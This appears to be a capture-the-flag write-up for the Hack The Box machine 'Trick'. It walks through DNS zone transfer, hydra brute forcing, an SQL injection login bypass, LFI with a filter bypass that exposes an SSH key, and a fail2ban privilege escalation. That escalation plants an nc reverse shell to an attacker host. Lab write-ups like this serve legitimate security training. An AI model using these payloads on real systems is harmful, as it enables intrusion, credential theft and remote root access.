Trick

Personal Rating: Medium

Enumeration

A more extensive nmap scan reveals interesting insights:

sudo nmap -A -p- -v <IP>

Discovered open port 80/tcp on 10.10.11.166
Discovered open port 53/tcp on 10.10.11.166
Discovered open port 22/tcp on 10.10.11.166
Discovered open port 25/tcp on 10.10.11.166

53/tcp open  domain
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian

Host script results:
| dns-blacklist: 
|   PROXY
|     misc.dnsbl.sorbs.net - FAIL
|   SPAM
|     l2.apews.org - FAIL
|_    list.quorum.to - FAIL
|_dns-brute: Can't guess domain of "10.10.11.166"; use dns-brute.domain script argument.

So a DNS Server is running on the box!

DNS AXFR Zone Transfer

I found a webserver on port 80, but was stuck there right at the beginning. After checking out the forum I found out that you had to guess the domain trick.htb. I added it to my hosts file and the IP to my resolv.conf as DNS server. Then I could perform an axfr zone transfer over the domain trick.htb with the box as DNS Server:

dig -t axfr @10.10.11.166 trick.htb
; <<>> DiG 9.18.4 <<>> -t axfr @10.10.11.166 trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 86 msec
;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)
;; WHEN: Sat Jul 09 01:58:08 CEST 2022
;; XFR size: 6 records (messages 1, bytes 231)

root.trick.htb seemed the same as 10.10.11.166:80, but preprod-payroll.trick.htb shew a php login page.

Fuzzing the pages I found, some php files were revealed. Most of them were not of interest though.

At users.php I found a supposed Administrator with the username Enemigosss

I started an ssh bruteforce on that user with hydra, but to no avail:

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt preprod-payroll.trick.htb http-post-form "/ajax.php:username=^USER^&password=^PASS^&Login:Login failed, invalid username or password!" -V

I once again had to consult the forum and found out that you should find a third subdomain by guessing. I fuzzed for preprod-FUZZ.trick.htb and found preprod-marketing.trick.htb.

The smtp port was a rabbithole by the way. I could enumerate users by accessing the port with telnet 25, but nothing special was possible. Another way would have been hydra:

hydra smtp-enum://trick.htb:25/rcpt -L "/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt" -p localhost

Manual SQLi

At http://preprod-marketing.trick.htb/login.php I performed some LFI testing and fuzzing, but didn't really find anything. The login page was susceptible to an SQLi though. After some testing I found a working payload to be this:

x' OR '1' = '1'-- -

LFI w/ Filter Bypass

On the authenticated page an LFI was possible:

....//....//....//etc/passwd

As seen, a simple WAF evasion was necessary. But then I could also get the ssh key of the user michael, using the LFI vulnerability.

-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
<SNIP>
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----

Fail2ban SUID Exploit

sudo -l reveals something:

(root) NOPASSWD: /etc/init.d/fail2ban restart

The command id also shew that the user was member of the security group. I searched for files with permissions of that group and found the folder /etc/fail2ban/action.d with root:security permissions.

The given permissions allow for removing the iptables-multiport.conf and replacing it with a custom one that executes /bin/nc ATTACKERIP 4444 -e /bin/bash upon banning someone. The config file is reset by a cronjob all two minutes, and I have to send many requests in a short period of time to get banned, so I automated both with a bash script on the target and hydra on my machine:

rm /etc/fail2ban/action.d/iptables-multiport.conf
cp /home/michael/temp /etc/fail2ban/action.d/iptables-multiport.conf
sudo /etc/init.d/fail2ban restart
nc -lnvp 4444
hydra -I -l root -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt <TARGETIP> -v ssh

Finding the according config file and finding out, what it does under which conditions was hard for me. I must say I really disliked the fact that you had to guess domains here. But during a real external pentest this might be required and more obvious, so I should expect it the next time.

PreviousSquashedNextPoison

Last updated